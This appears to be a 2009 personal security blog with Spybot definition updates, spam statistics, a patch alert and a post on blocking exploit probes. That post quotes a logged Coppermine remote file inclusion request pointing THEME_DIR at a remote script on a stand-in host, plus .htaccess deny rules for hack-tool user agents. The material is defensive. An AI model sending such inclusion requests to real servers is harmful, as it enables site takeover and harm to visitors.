Wiz's Computer and Website Security Blog

If you use Spybot Search and Destroy to protect your computer against spyware and malware, it is time again to run your manual updates. Malware writers are constantly modifying their programs to evade detection, so anti-malware vendors have to issue regular updates to keep up with the bad guys. New definitions and false positive fixes for Spybot Search and Destroy are usually released every Wednesday. This week's updates were released on schedule on July 29, 2009, as listed below. Some new and altered fake security programs were added to the detections, plus several new Trojans, rootkits and modified spam bots.

Updating Spybot Search and Destroy

Before you update Spybot Search and Destroy make sure you have the latest official version. Older versions are no longer supported and will cause you a lot of grief when you immunize and scan for problems. Only download Spybot S&D from the official website, at: spybot.info, or from its alternate domain: Safer-Networking.org. Fake versions with similar names will rip you off for payment to remove threats, whereas the real Spybot S&D is free (donations gladly accepted).

In case you are new to Spybot S&D, there are two ways to update the program and malware definitions. The preferred method (For Windows PCs) is to go to Start > (All) Programs > Spybot - Search & Destroy > Update Spybot - S&D. The independent update box will open. Leave the default options as is, unless you need all languages or want beta definitions, and click on "Search." Another box will open with "mirror" locations around the world where you can download updates. Select a location nearest to you from the list and click on "Continue." Make sure all updates are checked, then click on "Download." If all definitions are verified as being correct the check marks will disappear from the check boxes and be replaced with green arrow graphics. However, sometimes one or more mirror locations have not updated all of the definitions and you will get a red X for those definitions. Click on Go Back, select a different mirror, and try again. I have consistent success using Giganet or the Safer-Networking servers. When all updates have succeeded, click on "Exit."

You can also download the latest definition includes file from a clean PC and save them to a removable disk or drive, then install them into the Spybot S&D program while the infected PC is offline. This helps you disinfect a PC that cannot presently get online, or cannot access security websites for updates (because of the Conficker or similar malware), or due to other networking problems. The downloaded definition includes will look for a typical Spybot installation location and will update it instantly, as long as the program is closed during the updating process.

Download links and more instructions about using Spybot Search and Destroy are in my article titled "How to use Spybot Search & Destroy to fight malware".

The description of the latest definition updates and false positive fixes are in my extended comments below.

Additions to malware definitions made on July 29, 2009:

Malware (Includes rogue or fraudulent security programs, fake registry cleaners, and fake security alerts, plus other nasty programs)
+ Fraud.SystemGuard2009
+ Smitfraud-C.
+ WareOut
++ Win32.Agent.aal
++ Win32.Banload.ciho

PUPS (Possibly UnPopular Software or Potentially Unwanted Program)
++ DoubleD

Trojans (Trojans come to you disguised as something useful, or as a missing codec required to view a spammed video, but, like the Trojan Horse of antiquity, they hold dangerous contents that cause great harm! Many of these Trojans are Botnet infections, backdoors, malicious download agents and Rootkits.)
++ Exploit.MS08067.gen
++ PWS.Gamemania.gen
+ Virtumonde.sci
+ Virtumonde.sdn
+ Webshow
++ Win32.Agent.abqe
++ Win32.Agent.tdd
++ Win32.AutoRun.ww
++ Win32.Banker.ss
++ Win32.Banload.ciho
++ Win32.Prorat.jz
+ Win32.TDSS.clt
+ Win32.TDSS.gen
+ Win32.TDSS.or
+ Win32.TDSS.reg
+ Win32.TDSS.rtk
++ Win32.Udr.gen
+ Zlob.Downloader.apl
+ Zlob.Downloader.bs

Total: 1414855 fingerprints in 489974 rules for 4774 products.

False positive detections reported, discussed, or fixed this week:

There was a confirmed False Positive detection of "Win32.TDSS.rtk" in a 1994 game, named Master of Magic. This was fixed today. ;-)

Several forumites have reported a false positive detection of Virtumonde in %system32%\zipfldr.dll. Those folks needed to update to Spybot S&D 1.6.2 to fix these false alerts. Check your version number (Help > About) and update if it is not at least 1.6.2.

After you update definitions to fix false positives a restart of either TeaTimer or the Computer is required. If this doesn't fix the false positives, you may need to reset the TeaTimer detection list, as follows:

Right click the (TeaTimer) Resident tray icon
Select "Reset lists"

If that fails also, please read the rest of the things to try on this forum page, in replies #2 and #4.

When TeaTimer blocks the file you can also allow the file to be executed (also remove the check mark for deletion). You can exclude any file from further detections during a scan by right clicking the items in the Spybot S&D scan result and select "exclude this detection from further searches"

If you keep getting false positive detections and broken programs, due to TeaTimer issues, try disabling that module. You can toggle TeaTimer off and on by switching into Advanced Mode > Tools > Resident.

False Positives are reported and discussed in the Spybot S&D False Positives Forum.

As mentioned earlier, links and more instructions about using the program, or reporting suspected false positives, are found in my article titled How to use Spybot Search & Destroy to fight malware.

Posted by Wiz at 2:01 PM | Permalink

back to top ^

This is the latest entry in my weekly series about classifications of spam, according to my custom filter rules used by MailWasher Pro. The categories are shown on the "Statistics" page > "Junk Mail," as a pie chart, based on my custom filters and blacklist. The amount of email flagged as spam is shown on the "Summary" page of Statistics.

The volume of spam coming to my various honeypots and user accounts has remained the same two weeks in a row, at 21%. This suggests to me that some of the Botnet owners have once again restored their Control and Command servers. This is a cat and mouse game, with criminals leasing servers for use a Botnet controllers and authorities or upstream providers shutting them down.

The classifications of spam in my analysis can help you adjust your email filters according to what is most common, on a weekly basis. Most of the spam this week was for male enhancement scams and the fake Canadian Pharmacy, which sells illicit and counterfeit pharmaceuticals like Viagra, and is hosted on Botnetted PCs. Next, was spam for weight loss ripoffs and casinos.

See my extended comments for this week's breakdown of spam by category, for July 20 - 26, 2009 and the latest additions to my custom MailWasher Pro filters

MailWasher Pro spam category breakdown for July 20 - 26, 2009. Spam amounted to 21% of my incoming email this week. This represents no change from last week. Thursday July 23 was the worst day for spam, for the second week in a row.

Male Enhancement Patches, etc:	23.91%
Canadian Pharmacy spam:	21.74%
Viagra spam:	10.87%
Yahoo Groups Spam Link:	10.87%
"Other filters": (See my MWP Filters page)	8.70%
Known Spam Domains (a great filter!):	6.52%
Weight Loss Scams (e.g. Acai Berry)	4.35%
Known X-Mailer Spam:	4.35%
Casino spam:	2.17%
Pills Spam:	2.17%
Herbal Spam:	2.17%
DNS Blacklisted (SpamCop, Spamhaus):	2.17%

The latest weekly updates to my custom MailWasher Pro filters were the Viagra, Canadian Pharmacy, Fake MSN Newsletter and URL Shortener spam filters. I also moved the Subject is RE: or FW: filter down. Everything else is working as it should. My spam filters are very effective, especially the Canadian Pharmacy spam filters. If you're not already using MailWasher Pro to filter out spam, read on...

MailWasher Pro intercepts POP3 and IMAP email before you download it to your desktop email client (e.g: Microsoft Outlook, Outlook Express, Windows Live Mail) and scans it for threats or spam content, then either manually or automatically deletes any messages matching your pre-determined criteria and custom filters. It is my primary line of defense against incoming spam, scams, phishing and exploit attacks. If you are not already using this fine anti-spam tool I invite to to read about it on my MailWasher Pro web page. You can download the latest version and try it for free for a month. Registration is only required once, for the life of the program.

To protect your computer from web pages rigged with exploit codes, malware in email attachments, dangerous links to hostile web pages, JavaScript redirects, Phishing scams, or router DNS attack codes, I recommend Trend Micro Internet Security. It has strong realtime monitoring modules that stop rootkits and spam Trojans from installing themselves into your operating system. Also known as PC-cillin, it is very frequently updated as new and altered malware definitions become available and it checks for web based threats and new malware definitions by searching secure online servers owned by Trend Micro. This is referred to as "in-the-cloud" security.

All of the spam and scams targeting my accounts were either automatically deleted by my custom MailWasher Pro spam filters, or if they made it through, was reported to SpamCop, of which I am a reporting member, and manually deleted. MailWasher Pro is able to forward messages marked as spam to SpamCop, which then sends a confirmation email to you, containing a link. You must click on the enclosed reporting link and open it in your browser, then manually submit your report. This is how SpamCop wants it done.

Posted by Wiz at 4:43 PM | Permalink

back to top ^

July 25, 2009

There are some new vulnerabilities to be alerted to that are being exploited in the wild right now and may impact you. Some affect Windows computers, while others are cross platform (Linux, Mac, Solaris). Foremost among the vulnerable software are Internet Explorer, Visual Studio components and three Adobe programs.

First off, Microsoft just announced that they will be releasing two out-of-cycle security patches on Tuesday, July 28, 2009. This is very rare for Microsoft, who mainly stick to a Patch Tuesday happening just once a month schedule. The two vulnerabilities are being actively exploited in the wild and cannot wait until August 11 to be fixed. Too many PCs would be compromised by then.

If you have followed Microsoft's recommendation and set your Windows PCs to download and install Windows Updates Automatically, you will receive them sometime during the day of July 28, 2009, depending on where you are located. For folks living in the Eastern US time zone these updates will probably show up around 2 PM. If you are going to be away from your PC during that afternoon you should save any work in progress, because Windows Update will reboot your computer without interaction, if required to install those updates, after popping up a pending shutdown alert. If you aren't there to dismiss that alert your PC will be automatically rebooted to finish installing these critical patches.

Adobe has three products being exploited by cyber criminals this week. They are Adobe's Acrobat, Reader and Flash Player. This time the exploit lies in the way in which Adobe Reader and Acrobat are set to automatically run embedded Flash code whern a person opens a .pdf document (pdf = Portable Document Format) in any current version of Reader or Acrobat. In case you were wondering, Acrobat is an expensive program used to create pdf documents. Reader opens them for reading and printing. Flash is active content for interactive forms and video presentations on web pages, or for embedding into pdf files. YouTube videos are encoded using Adobe Flash and are viewed in Flash Player.

Adobe will be releasing patches on two days this month. An update for Flash Player v9 and v10 for Windows, Macintosh, and Linux will be available by July 30, 2009. They expect to provide an update for Adobe Reader and Acrobat v9.1.2 for Windows, Macintosh and UNIX by July 31, 2009. While you patiently wait for those patches you can protect you computers from getting hacked from hostile pdf documents by applying two officially recommended workarounds.

UPDATE:
August 2, 2009

Both Microsoft and Adobe did release the promised, out-of-band, critical updates, fixing the reported vulnerabilities in Microsoft's Internet Explorer and Visual Studio ATL and in Adobe's Flash, Reader and Acrobat. If you have not already done so, please run the Secunia Online Software Inspector, to see what insecure software is installed on your computers. Download links are provided in its report.

Note: If you are a programmer and have written any code that utilizes the Microsoft Visual Studio ATL, you may need to make changes to get those controls working again. See this MSDN page for more information about how the security update of 7/28/09 will impact your code.

Details about the Adobe vulnerabilities and their workarounds are in my extended content.

To protect your PCs from exploitation from Flash embedded in hostile pdf documents, apply the following workarounds as recommended by Adobe.

Deleting, renaming, or removing access to the authplay.dll file that ships with Adobe Reader and Acrobat v9.x mitigates the threat for those products, but users will experience a non-exploitable crash or error message when opening a PDF that contains SWF content. Depending on the product, the authplay.dll that ships with Adobe Reader and Acrobat 9.x for Windows is typically located at C:\Program Files\Adobe\Reader 9.0\Reader\authplay.dll, or in C:\Program Files\Adobe\Acrobat 9.0]\Acrobat\authplay.dll. Windows Vista users should consider enabling UAC (User Access Control) to mitigate the impact of a potential exploit. Flash Player users should exercise caution in browsing untrusted websites.

Again, Adobe plans to release patched versions of Flash Player on, or by July 30 and Reader/Acrobat on July 31, 2009. Always make sure that you get Adobe updates from Adobe.com. Do not trust any other source or domain names, as criminals disguise their malware as Flash Player updates or "required video codecs" to fool people lured to hostile websites via spam links. Links to Adobe should be verified in your browser's address bar before you accept an upgrade of Flash or Adobe Reader. Adobe Reader has a built in link to check for updates, under the Help menu, using its own downloader module.

Microsoft will be releasing critical updates on Tuesday, July 28, 2009. If you don't have Automatic Windows Updates turned on you must go get them manually. There is a link to Windows/Microsoft Update on the Start Menu of Windows 2000 through Vista/Windows7. This will open Internet Explorer and take you to the official WU web page.

If you already have Internet Explorer (IE) open you can go there via the Windows Update link under Tools menu item, for IE 5 through 7, and under Safety on IE 8.

Posted by Wiz at 6:29 PM | Permalink

back to top ^

If you use Spybot Search and Destroy to protect your computer against spyware and malware, it is time again to run your manual updates. Malware writers are constantly modifying their programs to evade detection, so anti-malware vendors have to issue regular updates to keep up with the bad guys. New definitions and false positive fixes for Spybot Search and Destroy are usually released every Wednesday. This week's updates were released on schedule on July 22, 2009, as listed below. Some new and altered fake security programs were added to the detections, plus several new Trojans, rootkits and modified spam bots.

Updating Spybot Search and Destroy

Before you update Spybot Search and Destroy make sure you have the latest official version. Older versions are no longer supported and will cause you a lot of grief when you immunize and scan for problems. Only download Spybot S&D from the official website, at: spybot.info, or from its alternate domain: Safer-Networking.org. Fake versions with similar names will rip you off for payment to remove threats, whereas the real Spybot S&D is free (donations gladly accepted).

In case you are new to Spybot S&D, there are two ways to update the program and malware definitions. The preferred method (For Windows PCs) is to go to Start > (All) Programs > Spybot - Search & Destroy > Update Spybot - S&D. The independent update box will open. Leave the default options as is, unless you need all languages or want beta definitions, and click on "Search." Another box will open with "mirror" locations around the world where you can download updates. Select a location nearest to you from the list and click on "Continue." Make sure all updates are checked, then click on "Download." If all definitions are verified as being correct the check marks will disappear from the check boxes and be replaced with green arrow graphics. However, sometimes one or more mirror locations have not updated all of the definitions and you will get a red X for those definitions. Click on Go Back, select a different mirror, and try again. I have consistent success using Giganet or the Safer-Networking servers. When all updates have succeeded, click on "Exit."

You can also download the latest definition includes file from a clean PC and save them to a removable disk or drive, then install them into the Spybot S&D program while the infected PC is offline. This helps you disinfect a PC that cannot presently get online, or cannot access security websites for updates (because of the Conficker or similar malware), or due to other networking problems. The downloaded definition includes will look for a typical Spybot installation location and will update it instantly, as long as the program is closed during the updating process.

Download links and more instructions about using Spybot Search and Destroy are in my article titled "How to use Spybot Search & Destroy to fight malware".

The description of the latest definition updates and false positive fixes are in my extended comments below.

Additions to malware definitions made on July 22, 2009:

Keyloggers
+ KGBKeylogger.REFOG

Malware (Includes rogue or fraudulent security programs, fake registry cleaners, and fake security alerts, plus other nasty programs)
+ BPSSpywareStriker
+ Fraud.PersonalAntivirus
+ Smitfraud-C.
+ Smitfraud-C.generic
++ Win32.Agent.aya
+ Win32.Agent.ieu
++ Win32.Agent.na
+ Win32.Banker
+ Win32.FraudLoad
+ Win32.FraudLoad.edt
++ Win32.Rbot.seh
+ Win32.Renos
+ ZenoSearch

PUPS (Possibly UnPopular Software or Potentially Unwanted Program)
+ MyWay.MyWebSearch (Search hijacker)
+ Zango

Trojans (Trojans come to you disguised as something useful, or as a missing codec required to view a spammed video, but, like the Trojan Horse of antiquity, they hold dangerous contents that cause great harm! Many of these Trojans are Botnet infections, backdoors, malicious download agents and Rootkits.)
+ Win32.TDSS.pe
+ Win32.TDSS.rtk
+ Win32.Podnuha.rtk
++ Win32.Agent.pdl
++ Win32.Agent.pql
++ Win32.Agent.kna
++ Win32.Agent.EDZG
+ Virtumonde.Dll
+ Virtumonde.sci
+ Virtumonde.sdn

Worm
+ Win32.Koobface

Total: 1469502 fingerprints in 506102 rules for 4767 products.

False positive detections reported, discussed, or fixed this week:

Spybot Resident (TeaTimer) alerts on install of Advanced System Care and terminates the process. This is a false positive and has been fixed with this week's updates.

Several forumites have reported a false positive detection of Virtumonde in %system32%\zipfldr.dll. Those folks needed to update to Spybot S&D 1.6.2 to fix these false alerts. Check your version number (Help > About) and update if it is not at least 1.6.2.

Finally, there is a controversy in several security forums and anti-malware companies, regarding a program called SpyHunter, from Enigma Software. Spybot S&D currently flags SpyHunter as a PUP (a Potentially Unwanted Program), as does Symantec, the makers of Norton security products. A happy user of that program has posted a question about a possible false positive in Spybot's detection of SpyHunter as a PUP. If I learn of a definitive answer to this question I will post it, either in a follow update, or in next week's article about Spybot updates. This is indeed an enigma, just like the name of the company that makes SpyHunter.

After you update definitions to fix false positives a restart of either TeaTimer or the Computer is required. If this doesn't fix the false positives, you may need to reset the TeaTimer detection list, as follows:

Right click the (TeaTimer) Resident tray icon
Select "Reset lists"

If that fails also, please read the rest of the things to try on this forum page, in replies #2 and #4.

When TeaTimer blocks the file you can also allow the file to be executed (also remove the check mark for deletion). You can exclude any file from further detections during a scan by right clicking the items in the Spybot S&D scan result and select "exclude this detection from further searches"

If you keep getting false positive detections and broken programs, due to TeaTimer issues, try disabling that module. You can toggle TeaTimer off and on by switching into Advanced Mode > Tools > Resident.

False Positives are reported and discussed in the Spybot S&D False Positives Forum.

As mentioned earlier, links and more instructions about using the program, or reporting suspected false positives, are found in my article titled How to use Spybot Search & Destroy to fight malware.

Posted by Wiz at 7:44 PM | Permalink

back to top ^

This is the latest entry in my weekly series about classifications of spam, according to my custom filter rules used by MailWasher Pro. The categories are shown on the "Statistics" page > "Junk Mail," as a pie chart, based on my custom filters and blacklist. The amount of email flagged as spam is shown on the "Summary" page of Statistics.

The volume of spam coming to my various honeypots and user accounts has increased markedly this week, after last week's decrease. This suggests to me that some of the Botnet owners have once again restored their Control and Command servers. This is a cat and mouse game, with criminals leasing servers for use a Botnet controllers and authorities or upstream providers shutting them down.

The classifications of spam in my analysis can help you adjust your email filters according to what is most common, on a weekly basis. Most of the spam this week was for the fake Canadian Pharmacy, which sells illicit and counterfeit pharmaceuticals like Viagra, and is hosted on Botnetted PCs. Next, was male enhancement scams, weight loss ripoffs, casinos and some Nigerian 419 scams.

See my extended comments for this week's breakdown of spam by category, for July 13 - 19, 2009 and the latest additions to my custom MailWasher Pro filters

MailWasher Pro spam category breakdown for July 13 - 19, 2009. Spam amounted to 21% of my incoming email this week. This represents a 9% increase from last week. Thursday July 16 was the worst day for spam.

"Other filters": (See my MWP Filters page)	16.98%
Canadian Pharmacy spam:	15.09%
Male Enhancement Patches, etc:	11.32%
Known Spam Domains (a great filter!):	9.43%
Viagra spam:	9.43%
Weight Loss Scams (e.g. Acai Berry)	7.55%
Known X-Mailer Spam:	7.55%
Casino spam:	5.66%
Counterfeit Watches:	5.66%
Nigerian 419 Scams:	3.77%
Subject is: RE: or FWD:	3.77%
Blacklisted Domains/Senders (e.g: kef+diz@+):	3.77%

The latest weekly additions to my custom MailWasher Pro filters were the Watches, Stud Tips and Breast enlargement filters. Everything else is working as it should. My spam filters are very effective, especially the Canadian Pharmacy spam filters. If you're not already using MailWasher Pro to filter out spam, read on...

MailWasher Pro intercepts POP3 and IMAP email before you download it to your desktop email client (e.g: Microsoft Outlook, Outlook Express, Windows Live Mail) and scans it for threats or spam content, then either manually or automatically deletes any messages matching your pre-determined criteria and custom filters. It is my primary line of defense against incoming spam, scams, phishing and exploit attacks. If you are not already using this fine anti-spam tool I invite to to read about it on my MailWasher Pro web page. You can download the latest version and try it for free for a month. Registration is only required once, for the life of the program.

To protect your computer from web pages rigged with exploit codes, malware in email attachments, dangerous links to hostile web pages, JavaScript redirects, Phishing scams, or router DNS attack codes, I recommend Trend Micro Internet Security. It has strong realtime monitoring modules that stop rootkits and spam Trojans from installing themselves into your operating system. Also known as PC-cillin, it is very frequently updated as new and altered malware definitions become available and it checks for web based threats and new malware definitions by searching secure online servers owned by Trend Micro. This is referred to as "in-the-cloud" security.

All of the spam and scams targeting my accounts were either automatically deleted by my custom MailWasher Pro spam filters, or if they made it through, was reported to SpamCop, of which I am a reporting member, and manually deleted. MailWasher Pro is able to forward messages marked as spam to SpamCop, which then sends a confirmation email to you, containing a link. You must click on the enclosed reporting link and open it in your browser, then manually submit your report. This is how SpamCop wants it done.

Posted by Wiz at 1:44 PM | Permalink

back to top ^

While reading my raw access logs I noticed that a lot of the recent exploit attacks hitting my website are coming from China and Korea. I can't say with certainty that the attacks originated in those countries, because they could be coming from compromised servers. Do you care whether an attack originated at the server that is attacking yours? Hell no! If some black hat hacker is commandeering a hundred thousand Chinese servers and using them to attack my servers I block the Chinese IP addresses since they are attacking me.

Here is a typical, recent exploit attempt, coming from a server in China. I have changed the destination URL to example.com for your safety.

218.246.20.221 - - [17/Jul/2009:14:36:29 -0700] "GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://example.com/gboard/rs/copyright.txt? HTTP/1.1" 403 137 "-" "Mozilla/5.0"

If I was running a vulnerable version of the targeted "Coppermine" software, that upload attempt would have yielded a server 200 Success, instead of a 403 Forbidden response. This would have led to the exploitation of my website and hidden iframes would redirect my visitors to hostile destinations. I won't willingly allow that to happen and neither should other webmasters.

So, you ask, how do I block these Chinese servers from attacking my websites? If your websites are hosted on Apache web servers I can offer you two effective means of blocking those exploit probes. The details follow.

Blocking Chinese servers or personal computers from your websites

Several years ago I began reading the access logs for my websites and learned that hackers were targeting me with various exploit attacks. The goal of all of those attacks is to find an unpatched, vulnerable version of a PHP script that is installed on your website and inject hostile files into it, then use them to write iframe redirection codes to other files in your website. Take a look at this previously listed example

218.246.20.221 - - [17/Jul/2009:14:36:29 -0700] "GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://example.com/gboard/rs/copyright.txt? HTTP/1.1" 403 137 "-" "Mozilla/5.0"

First of all, let's run a Whois lookup to see where that IP address is located.

http://whois.domaintools.com/218.246.20.221
IP Location: China China Beijing Development & Research Center Of State Council Net
inetnum: 218.246.0.0 - 218.246.31.255

Next, I Googled on the exploit path: GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR= and found many results defining this attack. Here is but one:

Coppermine Photo Gallery contains a flaw that may allow a remote attacker to execute arbitrary code. The issue is triggered when sending a specially crafted URL request to the theme.php script using the THEME_DIR variable to specify a malicious file from a remote system as a parameter.

The next parameter lists the http destination where a text file is hosted.

http://example.com/gboard/rs/copyright.txt?

That file is really a PHP script in disguise and it is usually hosted unknowingly on somebody's compromised website. Note, that some exploit files are actually hosted on hostile servers owned by cyber criminals.

Then we come to the number 403. It signifies that this attempt was Forbidden by my server configuration. I will be showing you how to accomplish the same thing on your server, or website.

Last, the stated user agent is one commonly used by server hacking programs: "Mozilla/5.0" Another common exploit tool is named “libwww-perl/(version numbers)″

Blocking hacking attacks by user agent

The first line of defense is to block access to known hack-tool user agents. The two I have shown in this article are the most frequently used agents, but others are used from time to time. The following codes can be added to your web-root .htaccess file to block access to all files, for these hacker user agents:

Options +FollowSymLinks
RewriteEngine On
RewriteBase /

RewriteCond %{HTTP_USER_AGENT} ^Mozilla/5\.0$ [OR]
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl/
RewriteRule .* - [F]

Protecting a dedicated, semi-dedicated, or VPS server from Chinese exploit attacks

Business and reseller hosting accounts are typically hosted on dedicated, or semi-dedicated servers. The lessee is usually expected to manage the leased server themselves, although managed hosting is usually available at a monthly cost. People renting or owning dedicated servers have technicians who manage updates, patches and firewalls.

If you manage your own web server that runs on Linux or Unix, you can apply my frequently updated Chinese iptables blocklist to your server's firewall. There is an up to date blocklist embedded on that page. You can copy and paste the list of IP addresses, in iptables format, into a Linux APF firewall, or a similar firewall. Instructions are found here for installing these firewalls and adding new rules.

If you lease a dedicated server and don't understand how to install and update the firewall ask for technical assistance from your hosting company. They usually provide firewall updates as a service to dedicated and VPS customers, for the protection of all involved.

Protecting individual websites from Chinese exploit attacks

Most private websites are hosted on shared hosting servers, where you are e-pluibus-unum - one out of many - accounts. You will not have access to the server's firewall, or the Linux operating system. You are only able to control access to your own web pages. You need to apply my Chinese .htaccess blocklist to your public web root .htaccess file.

Experienced webmasters know that server files beginning with a period are normally hidden server configuration files. These files can be made visible by configuring your FTP client with the remote mask code: -al which unhides .htaccess and other hidden server control files in the remote location browser section. Some FTP clients may have a simple checkbox to display these files. Online control panels usually include a website file browser and usually they show files beginning with a period.

Not every website comes with a .htaccess file, so, if you don't see one and hidden files are displayed, you will need to create a new .htaccess file. Or, just copy the contents of my blocklist, between the sections marked as containing the .htaccess rules and paste it into a new plain text file. Save that file as .htaccess and upload it to your website, in the public_html or equivalent directory. Be sure to immediately test your website to ensure that you haven't pasted in an uncommented character by accident, which will result in a Server 500 lockout error. .htaccess comments begin with a # sign. Directives begin with specific characters or words. Be careful when editing your .htaccess file. If you include an uncommented word that is not recognized as a legitimate command, a Server 500 will result and nobody will see your web pages until this is fixed.

Example of a good comment in a .htaccess file.

# This is a legitimate comment in .htaccess

Example of a bad comment in a .htaccess file.

This comment will cause a Server 500 error because it is not preceded by a # symbol.

Using .htaccess Mod-Access to block offending IP addresses

Here is an example of the correct .htaccess terminology to deny access to the offending Chinese address that is listed throughout this article.

<Files *>
deny from 218.246.20.221
</Files>

That blocks just that one server IP address. This doesn't accomplish much when there are several million Chinese and Korean IP addresses that may be used to attack your server. Instead of listing every one of those IP addresses, I use complete ranges assigned to the ISP or hosting company, as I discover them. The format used is called a CIDR, which means Classless InterDomain Routing. Below is the CIDR that encompasses the attacker's IP address.

<Files *>
deny from 218.246.0.0/16
</Files>

Using the CIDR 218.246.0.0/16 blocks all IP addresses between 218.246.0.0 and 218.246.255.255. All (four) of my .htaccess blocklists usually list entire CIDRs, although there may be a few individual IPs included here and there. There are dozens to hundreds of CIDRs in my various blocklists. The Chinese blocklist is ever-growing as I discover new CIDRs that have been assigned to servers and ISPs in that area of the World. Many webmasters apply my blocklists to protect thir servers and websites from exploiters, hackers, spammers and scammers.

Note, that only the iptables blocklist will keep the attempted hacks from appearing in the access logs for individual websites. If you only have use of my .htaccess blocklists you will see these attacks, but they should all result in a server 403 response.

My .htaccess blocklists are linked to on this page.

My iptables blocklists are found here.

Posted by Wiz at 12:11 PM | Permalink

back to top ^

If you use Spybot Search and Destroy to protect your computer against spyware and malware, it is time again to run your manual updates. Malware writers are constantly modifying their programs to evade detection, so anti-malware vendors have to issue regular updates to keep up with the bad guys. New definitions and false positive fixes for Spybot Search and Destroy are usually released every Wednesday. This week's updates were released on schedule on July 15, 2009, as listed below. Some new and altered fake security programs were added to the detections, plus several new Trojans, rootkits and modified spam bots.

Updating Spybot Search and Destroy

Before you update Spybot Search and Destroy make sure you have the latest official version. Older versions are no longer supported and will cause you a lot of grief when you immunize and scan for problems. Only download Spybot S&D from the official website, at: spybot.info, or from its alternate domain: Safer-Networking.org. Fake versions with similar names will rip you off for payment to remove threats, whereas the real Spybot S&D is free (donations gladly accepted).

In case you are new to Spybot S&D, there are two ways to update the program and malware definitions. The preferred method (For Windows PCs) is to go to Start > (All) Programs > Spybot - Search & Destroy > Update Spybot - S&D. The independent update box will open. Leave the default options as is, unless you need all languages or want beta definitions, and click on "Search." Another box will open with "mirror" locations around the world where you can download updates. Select a location nearest to you from the list and click on "Continue." Make sure all updates are checked, then click on "Download." If all definitions are verified as being correct the check marks will disappear from the check boxes and be replaced with green arrow graphics. However, sometimes one or more mirror locations have not updated all of the definitions and you will get a red X for those definitions. Click on Go Back, select a different mirror, and try again. I have consistent success using Giganet or the Safer-Networking servers. When all updates have succeeded, click on "Exit."

Download links and more instructions about using Spybot Search and Destroy are in my article titled "How to use Spybot Search & Destroy to fight malware".

The description of the latest definition updates and false positive fixes are in my extended comments below.

Additions to malware definitions made on July 15, 2009:

Adware
++ Need2Find
+ RXToolbar

Dialer
++ EroDial

Keyloggers
+ ActualSpy
+ Ardamax

Malware (Includes rogue or fraudulent security programs, fake registry cleaners, and fake security alerts, plus other nasty programs)
++ Win32.Agent.na
++ Win32.Agent.pql
+ Win32.Banker
+ Win32.FraudLoad
+ Fraud.PersonalAntivirus
+ Fraud.Sysguard
++ Fraud.UltimateDefender
++ Fraud.WiniblueSoftware
++ Fraud.WiniFighter
+ Fraud.XPDeluxeProtector
+ Smitfraud-C.
++ Win32.Rbot.seh
+ Win32.Renos
+ WinWebSecurity

PUPS (Possibly UnPopular Software or Potentially Unwanted Program)
+ Hotbar
+ MyWay.MyWebSearch (Most prevalent PUP malware detection last week)
++ Turkojan

Trojans (Trojans come to you disguised as something useful, or as a missing codec required to view a spammed video, but, like the Trojan Horse of antiquity, they hold dangerous contents that cause great harm! Many of these Trojans are Botnet infections, backdoors, malicious download agents and Rootkits.)
+ PurityScan
+ Virtumonde.sci
+ Virtumonde.sdn
+ Win32.Agent.h
+ Win32.Agent.qt
++ Win32.Agent.ws
++ Win32.Dursg
+ Win32.FraudLoad.pd
+ Win32.Iksmas.ai
+ Win32.IRCBOT.cmn
++ Win32.Kolabc.ezg
+ Win32.Koobface
++ Win32.LDPinch.m
++ Win32.Monderb.aqpu
++ Win32.Podnuha.rtk
+ Win32.Rbot.fx
+ Win32.Small.azl
++ Win32.Small.rn
+ Win32.TDSS.clt
+ Win32.TDSS.dt
+ Win32.TDSS.gen
+ Win32.TDSS.pe
+ Win32.TDSS.rtk
++ Win32.VB.ruk
+ Win32.Virut.bg
+ Win32.ZBot
+ Zlob.Downloader
+ Zlob.PerfectCodec

Worm
++ Blackmail
+ Win32.Koobface

Total: 1467822 fingerprints in 505684 rules for 4757 products.

False positive detections reported, discussed, or fixed this week:

Spybot Resident (TeaTimer) alerts on install of Advanced System Care and terminates the process. This is being investigated as a probable false positive.

Heuristic detections of infections in regsvr32.exe and rundll32.exe are false positives with the heuristics part of the single file scanner. A fix was released on 07-15-2009.

Spybot detecting MBAM as malware has been fixed! MalwareBytes AntiMalware is not an infection; it is the opposite! I just used to to clean up a severely infected system. Download new definitions, restart and scan again.

After you update definitions to fix false positives a restart of either TeaTimer or the Computer is required. If this doesn't fix the false positives, you may need to reset the TeaTimer detection list, as follows:

Right click the (TeaTimer) Resident tray icon
Select "Reset lists"

If that fails also, please read the rest of the things to try on this forum page, in replies #2 and #4.

When TeaTimer blocks the file you can also allow the file to be executed (also remove the check mark for deletion). You can exclude any file from further detections during a scan by right clicking the items in the Spybot S&D scan result and select "exclude this detection from further searches"

If you keep getting false positive detections and broken programs, due to TeaTimer issues, try disabling that module. You can toggle TeaTimer off and on by switching into Advanced Mode > Tools > Resident.

False Positives are reported and discussed in the Spybot S&D False Positives Forum.

As mentioned earlier, links and more instructions about using the program, or reporting suspected false positives, are found in my article titled How to use Spybot Search & Destroy to fight malware.

Posted by Wiz at 2:29 PM | Permalink

back to top ^

This is the latest entry in my weekly series about classifications of spam, according to my custom filter rules used by MailWasher Pro. The categories are shown on the "Statistics" page > "Junk Mail," as a pie chart, based on my custom filters and blacklist. The amount of email flagged as spam is shown on the "Summary" page of Statistics.

The volume of spam coming to my various honeypots and user accounts has decreased slightly this week, after several weeks of increases. This suggests to me that some of the Botnets have once again lost their Control and Command servers, following the recent forced shutdown of colocation host Pricewert. Pricewert hosting customers included several Botnet Command and Control servers. Spammers found other hosts, but appear to be having trouble maintaining them.

The classifications of spam in my analysis can help you adjust your email filters according to what is most common, on a weekly basis. Most of the spam this week was for the fake Canadian Pharmacy, which sells illicit and counterfeit pharmaceuticals like Viagra, weight loss ripoffs and pirated software. There was even some casino spam last week.

See my extended comments for this week's breakdown of spam by category, for July 6 - 12, 2009 and the latest additions to my custom MailWasher Pro filters

MailWasher Pro spam category breakdown for July 6 - 12, 2009. Spam amounted to 12% of my incoming email this week. This represents a 7% decrease from last week.

Known Spam Domains (a great filter!):	42.31%
Canadian Pharmacy spam:	15.38%
Viagra spam:	7.69%
Weight Loss Scams (e.g. Acai Berry)	7.69%
Casino spam:	3.85%
Male Enhancement Patches, etc:	3.85%
Yahoo Groups Spam Link:	3.85%
Counterfeit Software:	3.85%
Blacklisted Domains/Senders (e.g: kef+diz@+):	3.85%
Pharmaceutical Spam:	3.85%
